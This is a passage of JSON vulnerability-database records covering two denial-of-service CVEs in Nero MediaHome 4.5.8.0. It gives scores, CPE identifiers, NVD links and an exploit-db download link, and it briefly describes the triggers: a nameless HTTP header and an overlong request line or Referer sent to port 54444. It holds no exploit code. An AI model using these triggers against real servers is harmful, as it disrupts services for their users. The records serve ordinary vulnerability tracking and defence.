"https://www.exploit-db.com/download/24022", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cve": [{"lastseen": "2022-03-23T13:29:04", "description": "Nero MediaHome 4.5.8.0 and earlier allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an HTTP header without a name.", "cvss3": {}, "published": "2014-05-30T14:55:00", "type": "cve", "title": "CVE-2012-5877", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5877"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:nero:mediahome:4.5.8.0"], "id": "CVE-2012-5877", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5877", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:nero:mediahome:4.5.8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:29:01", "description": "Multiple off-by-one errors in NMMediaServerService.dll in Nero MediaHome 4.5.8.0 and earlier allow remote attackers to cause a denial of service (crash) via a long string in the (1) request line or (2) HTTP Referer header to TCP port 54444, which triggers a heap-based buffer overflow.", "cvss3": {}, "published": "2014-05-30T14:55:00", "type": "cve", "title": "CVE-2012-5876", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5876"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:nero:mediahome:4.5.8.0"], "id": "CVE-2012-5876", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5876", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:nero:mediahome:4.5.8.0:*:*:*:*:*:*:*"]}]}